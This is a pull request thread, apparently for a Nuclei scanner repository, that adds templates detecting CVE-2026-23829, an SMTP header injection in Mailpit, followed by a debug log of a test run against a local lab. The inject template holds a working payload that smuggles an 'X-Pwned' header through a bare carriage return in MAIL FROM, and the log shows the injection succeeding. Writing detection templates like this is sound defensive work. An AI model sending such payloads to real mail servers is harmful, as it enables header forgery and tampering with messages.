Add CVE-2026-23829 for Mailpit SMTP CRLF Injection

[omarkurt]

Mailpit versions before 1.28.2 are vulnerable to SMTP CRLF Injection due to insufficient regex validation. Upgrade to version 1.28.3 or later to fix this issue.

PR Information

• Added CVE-2026-23829

Template validation

• Validated with a host running a vulnerable version and/or configuration (True Positive)
• Validated with a host running a patched version and/or configuration (avoid False Positive)

equisites are obligatory; they are merely intended to speed the review process. -->

[pussycat0x]

Hello @omarkurt, we really appreciate you sharing this template with us. However, we’re experiencing some challenges in validating it. Could you please provide the debug data? That would be incredibly helpful! Thank you!

[omarkurt]

@pussycat0x , thanks for your efforts!

The template is functional, but it was quite confusing. I’ve simplified it and provided some information for better clarity.

By the way, there’s already an existing lab for the VT (VulnerableTarget) environment we’re using. https://vulnerabletarget.com/VT-2026-23829

vt-2026-23829-inject.yaml

id: vt-2026-23829-inject

info:
  name: "Mailpit SMTP Header Injection - Injector"
  author: omarkurt
  severity: medium
  tags: cve,cve-2026,mailpit,smtp,injection
  description: |
    This template injects a custom header into an SMTP transaction to test for header injection vulnerabilities in Mailpit. By sending a specially crafted MAIL FROM command with a newline and additional header, we can determine if the server is vulnerable to header injection. This is a non-destructive test that does not rely on any specific response content, making it suitable for safely identifying the vulnerability.
network:
  - host:
      - "{{Hostname}}:1025"
    
    read-all: true
    read-size: 4096

    inputs:
      - data: "EHLO {{Hostname}}\r\n"
      # Injecting X-Pwned header via MAIL FROM (Bare CR)
      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
      - data: "RCPT TO:<victim@example.com>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: CVE-2026-23829 Proof\r\n\r\nCombined Template Check.\r\n.\r\n"
      - data: "QUIT\r\n"

    matchers:
      - type: word
        words:
          - "250 Ok"
          - "250 2.1.0 Ok"
        condition: or

vt-2026-23829-verify.yaml

id: vt-2026-23829-verify

info:
  name: "Mailpit SMTP Header Injection - Verification"
  author: omarkurt
  severity: medium
  description: |
    Checks the Mailpit API for the injected 'X-Pwned' header in the latest message.
  tags: cve,cve-2026,mailpit,api

variables:
  rnd: "true"

http:
  - method: GET
    path:
      - "http://{{Hostname}}:8025/api/v1/messages?limit=1"

    extractors:
      - type: json
        name: msg_id
        part: body
        json:
          - ".messages[0].ID"
        internal: true

  - method: GET
    path:
      - "http://{{Hostname}}:8025/api/v1/message/{{msg_id}}/raw"

    matchers:
      - type: word
        words:
          - "X-Pwned:"
        condition: or

vt-2026-23829-workflow.yaml

nuclei -w vt-2026-23829-workflow.yaml -u localhost --debug

...
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] Workflows loaded for current scan: 1
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 0 URL from httpx
[INF] [vt-2026-23829-inject] Dumped Network request for localhost:1025
00000000  45 48 4c 4f 20 6c 6f 63  61 6c 68 6f 73 74 0d 0a  |EHLO localhost..|
00000010  4d 41 49 4c 20 46 52 4f  4d 3a 3c 61 74 74 61 63  |MAIL FROM:<attac|
00000020  6b 65 72 0d 58 2d 50 77  6e 65 64 3a 33 39 48 6e  |ker.X-Pwned:39Hn|
00000030  6e 61 63 41 72 54 44 33  33 5a 31 50 6a 4f 57 79  |nacArTD33Z1PjOWy|
00000040  57 5a 75 6c 78 6e 6f 3e  0d 0a 52 43 50 54 20 54  |WZulxno>..RCPT T|
00000050  4f 3a 3c 76 69 63 74 69  6d 40 65 78 61 6d 70 6c  |O:<victim@exampl|
00000060  65 2e 63 6f 6d 3e 0d 0a  44 41 54 41 0d 0a 53 75  |e.com>..DATA..Su|
00000070  62 6a 65 63 74 3a 20 43  56 45 2d 32 30 32 36 2d  |bject: CVE-2026-|
00000080  32 33 38 32 39 20 50 72  6f 6f 66 0d 0a 0d 0a 43  |23829 Proof....C|
00000090  6f 6d 62 69 6e 65 64 20  54 65 6d 70 6c 61 74 65  |ombined Template|
000000a0  20 43 68 65 63 6b 2e 0d  0a 2e 0d 0a 51 55 49 54  | Check......QUIT|
000000b0  0d 0a                                             |..| address=localhost:1025
[vt-2026-23829-inject:word-1] [tcp] [medium] localhost:1025
[DBG] [vt-2026-23829-inject] Dumped Network response for localhost:1025

00000000  32 32 30 20 36 36 34 30  38 30 33 65 38 62 34 62  |220 6640803e8b4b|
00000010  20 4d 61 69 6c 70 69 74  20 45 53 4d 54 50 20 53  | Mailpit ESMTP S|
00000020  65 72 76 69 63 65 20 72  65 61 64 79 0d 0a 32 35  |ervice ready..25|
00000030  30 2d 36 36 34 30 38 30  33 65 38 62 34 62 20 67  |0-6640803e8b4b g|
00000040  72 65 65 74 73 20 6c 6f  63 61 6c 68 6f 73 74 0d  |reets localhost.|
00000050  0a 32 35 30 2d 53 49 5a  45 20 30 0d 0a 32 35 30  |.250-SIZE 0..250|
00000060  2d 45 4e 48 41 4e 43 45  44 53 54 41 54 55 53 43  |-ENHANCEDSTATUSC|
00000070  4f 44 45 53 0d 0a 32 35  30 20 53 4d 54 50 55 54  |ODES..250 SMTPUT|
00000080  46 38 0d 0a 32 35 30 20  32 2e 31 2e 30 20 4f 6b  |F8..250 2.1.0 Ok|
00000090  0d 0a 32 35 30 20 32 2e  31 2e 35 20 4f 6b 0d 0a  |..250 2.1.5 Ok..|
000000a0  33 35 34 20 53 74 61 72  74 20 6d 61 69 6c 20 69  |354 Start mail i|
000000b0  6e 70 75 74 3b 20 65 6e  64 20 77 69 74 68 20 3c  |nput; end with <|
000000c0  43 52 3e 3c 4c 46 3e 2e  3c 43 52 3e 3c 4c 46 3e  |CR><LF>.<CR><LF>|
000000d0  0d 0a 32 35 30 20 32 2e  30 2e 30 20 4f 6b 3a 20  |..250 2.0.0 Ok: |
000000e0  71 75 65 75 65 64 20 61  73 20 37 62 66 45 75 6f  |queued as 7bfEuo|
000000f0  6b 48 45 73 39 76 70 47  52 48 79 51 48 64 54 50  |kHEs9vpGRHyQHdTP|
00000100  0d 0a 32 32 31 20 32 2e  30 2e 30 20 36 36 34 30  |..221 2.0.0 6640|
00000110  38 30 33 65 38 62 34 62  20 4d 61 69 6c 70 69 74  |803e8b4b Mailpit|
00000120  20 45 53 4d 54 50 20 53  65 72 76 69 63 65 20 63  | ESMTP Service c|
00000130  6c 6f 73 69 6e 67 20 74  72 61 6e 73 6d 69 73 73  |losing transmiss|
00000140  69 6f 6e 20 63 68 61 6e  6e 65 6c 0d 0a           |ion channel..|
[INF] [vt-2026-23829-verify] Dumped HTTP request for http://localhost:8025/api/v1/messages?limit=1

GET /api/v1/messages?limit=1 HTTP/1.1
Host: localhost:8025
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [vt-2026-23829-verify] Dumped HTTP response http://localhost:8025/api/v1/messages?limit=1

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'nonce-495ghLJQssGbYDHDyAnxN3'; style-src * 'unsafe-inline'; frame-src 'self'; img-src * data: blob:; font-src * data:; media-src 'self'; connect-src 'self' ws: wss:; object-src 'none'; base-uri 'self';
Content-Type: application/json
Date: Fri, 06 Feb 2026 07:13:51 GMT
Referrer-Policy: no-referrer

{"total":3,"unread":2,"count":1,"messages_count":3,"messages_unread":2,"start":0,"tags":[],"messages":[{"ID":"7bfEuokHEs9vpGRHyQHdTP","MessageID":"UqvFHcZcSZPe4YxL4Ktf7j@mailpit","Read":false,"From":{"Name":"","Address":""},"To":null,"Cc":null,"Bcc":[{"Name":"","Address":"victim@example.com"}],"ReplyTo":[],"Subject":"CVE-2026-23829 Proof","Created":"2026-02-06T07:13:51.962Z","Username":"","Tags":[],"Size":360,"Attachments":0,"Snippet":"Combined Template Check."}]}
[INF] [vt-2026-23829-verify] Dumped HTTP request for http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw

GET /api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw HTTP/1.1
Host: localhost:8025
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [vt-2026-23829-verify] Dumped HTTP response http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'nonce-cgDTF273dkqfj7CgHSG6ZT'; style-src * 'unsafe-inline'; frame-src 'self'; img-src * data: blob:; font-src * data:; media-src 'self'; connect-src 'self' ws: wss:; object-src 'none'; base-uri 'self';
Content-Type: text/plain; charset=utf-8
Date: Fri, 06 Feb 2026 07:13:51 GMT
Referrer-Policy: no-referrer

Bcc: victim@example.com
Message-ID: <UqvFHcZcSZPe4YxL4Ktf7j@mailpit>
X-Pwned:39HnnacArTD33Z1PjOWyWZulxno>
Received: from localhost (unknown [192.168.155.1])
        by 6640803e8b4b (Mailpit) with SMTP
        for <victim@example.com>; Fri, 6 Feb 2026 07:13:51 +0000 (UTC)
Subject: CVE-2026-23829 Proof

Combined Template Check.
[vt-2026-23829-verify:word-1] [http] [medium] http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw
[INF] Scan completed in 56.678334ms. 2 matches found.